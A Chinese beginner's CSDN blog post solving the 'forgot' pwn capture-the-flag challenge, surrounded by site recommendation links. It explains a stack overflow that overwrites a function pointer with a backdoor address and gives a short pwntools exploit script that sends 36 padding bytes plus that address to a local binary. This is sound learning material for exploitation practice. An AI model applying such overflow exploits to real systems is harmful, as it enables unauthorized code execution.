萌新入坑(5)

最新推荐文章于 2022-07-02 22:58:23 发布
最新推荐文章于 2022-07-02 22:58:23 发布
阅读量107 收藏
点赞数
分类专栏: 任务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44319142/article/details/89406893
版权

forgot

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
根据提示
在这里插入图片描述
应该是在case4break的,把那个位置的地址利用v12的数组越界覆盖位后门函数的地址,看上面的图有提示停在dot,dot表示点,第四句46是点的ascall码,所以应该在四停,核心的逻辑也没推出来,要头秃了,所以简单来说是栈溢出,算出v12到第二个函数地址,那个位置写后门函数
exp如下

from pwn import *
context.log_level = "debug"
p=process("./forgot")
p.sendlineafter("> " , "fantasy")
payload = "a" * 36 + p32(0x80486CC)
p.sendlineafter("> " , payload)
p.revc#记得用这个接收
Xuan~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1_萌新入坑一图流.pom.wpsonline
11-12
1_萌新入坑一图流.pom.wpsonline
萌新入坑
最新发布
lmy050813的博客
11-04 78
我也会在csdn上发布一些自己的见解和一些有趣的项目,当然了也可能会有一些简单算法的理解(因为难的算法我也不会,嘿嘿),也欢迎各位大佬对我的帖子提出建议啦。Hello,csdn区的各位好,我是今年入坑计算机,开始学习C语言。都说c是世界上最好的语言,当然,可能不同的人对“最好”这个词理解各有不同䁖。但不管如何,既然选择了这条路,只能义无反顾地走下去。所以在今后学习各种计算机语言的路上,还望各位大佬多多指教。
萌新入坑
C202207chenzhiqi的博客
01-19 212
萌新入坑 C++萌新前来报到,求大佬们关照关照~
vue搭载mock萌新入坑指北
qq_45910045的博客
01-07 167
Mock原理 你好! Mock其实是需要Axios配套使用的,本地数据模拟器,是以Js或Json的方式提供数据,利用Axios的拦截器性质,拦截固定的接口返回给相同的数据,这样我们就可以不依赖后端而进行独立开发。达到快速开发的效果,后期禁用Mock就可以正常访问接口了,直接进入调试阶段! 安装 npm install mock npm install axios 安装完成后,我们需要在和src同级别的路径创建Mock文件夹(记得全小写mock),同时创建mock.js文件,如下 引入Mock 在Main.
萌新入坑,请多关照
EVEnMore_的博客
07-02 132
萌新入坑,快来欺负
2023年ChatGPT发布后,AI 领域还值得萌新入坑么?
03-27
当然值得!AI 领域是一个发展迅速、前途无量的领域,其中包含了机器学习、深度学习、自然语言处理、计算机视觉等各种分支,它们都有广泛的应用场景...AI 技术的发展将会改变我们的未来,带来新的经济增长点和社会发展动
入坑微信小程序(项目搭建)上
03-29
超荣幸能够参与我司【更美小程序】的搭建,在此分享些心得希望能够帮助到像我一样的前端界萌新。因【更美小程序】源码需保密,我仅向大家分享基础建设级别的非业务代码。点我~ 一个最基本的小程序项目需具备:app.js...
用51单片机做一个物联网温度计+远程开关.pdf
04-07
2,刚毕业的萌新或者还没有毕业的青年男女,想学习物联网知识,这个适合你练手。 3,已经入坑单片机开发很久的工程师,想了解最新的物联网架构,接触一下互联网的思维,这个很合适。 4,拿这个项目练手很“划算”。...
矩阵LED计算器.zip
10-03
msp430,软件用的是IAR,一个4*4矩阵按键计算器,文件内附带Proteus仿真图,萌新入坑,请多指教。
堆溢出
weixin_44319142的博客
04-23 3106
原理 堆溢出是指程序向某个堆块中写入的字节数超过了堆块本身可使用的字节数(之所以是可使用而不是用户申请的字节数,是因为堆管理器会对用户所申请的字节数进行调整,这也导致可利用的字节数都不小于用户申请的字节数),因而导致了数据溢出,并覆盖到物理相邻的高地址的下一个堆块。 不难发现,堆溢出漏洞发生的基本前提是 1、程序向堆上写入数据。 2、写入的数据大小没有被良好地控制。 思路主要是 1、覆盖与其物...
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2847
get_shell
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2580
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露的地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
攻防世界萌新入门(1)
weixin_44319142的博客
04-07 2454
cgpwn2 首先查看一下 开心的萌新题目,只开了nx嘻嘻嘻嘻嘻嘻嘻 只有hello()函数需要看看 程序里边儿就有system函数可以直接调用哈哈哈哈 不过没有“/bin/sh”的字符串,所以要写进去,要写到bss,怎么写呢,我记得原来只用过read,这里有fgets,点进去看到name是一个全局变量,在bss 利用这个把/bin/sh写进去,然后,利用gets函数覆盖返回地址到syst...
Pwn题——canary
weixin_44319142的博客
04-03 1757
canary 嘤嘤,不仅NX打开了,栈里面还有canary,这是什么鬼。。。。。 Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序。Canary最高字节一般是\x00,防止由于其他...
任务三 Pwn100任务
weixin_44319142的博客
02-04 1466
gdb https://blog.csdn.net/zdy0_2004/article/details/80102076 内容很详细 编译带调试信息的可执行程序:用gcc(g++)编译的时候带上-g选项即可 启动GDB开始调试 (1)gdb program ///最常用的用gdb启动程序,开始调试的方式 (2)gdb program core ///用gdb...
pwn学习任务(二)
weixin_44319142的博客
12-31 1391
PWN学习任务(二) Python字符串处理 zio库用法 pwntools库用法 学习使用socat开端口运行程序 掌握ida远程调试方法 pwn题目远程调试的运行 Python字符串处理 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + Shif...
攻防世界——pwn(2)
weixin_44319142的博客
04-09 1301
hello_pwn 只有NX哟 没啥好说的,填充然后让60106c的位置为1853186401就可以啦 直接上exp from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payload = "A"*4 + p64(1853186401) p.send(payl...
攻防世界——pwn(3)
weixin_44319142的博客
04-11 850
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
kali linux基本口令_kali linux 新手入坑指南(命令篇)
06-08
1. 使用root用户登录Kali Linux系统。 2. 打开终端并输入...4. 输入新密码并确认新密码。 请注意,更改密码时,屏幕上不会显示任何字符。您只需要输入密码并按下“Enter”键即可。 希望这个回答能够帮助到您!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值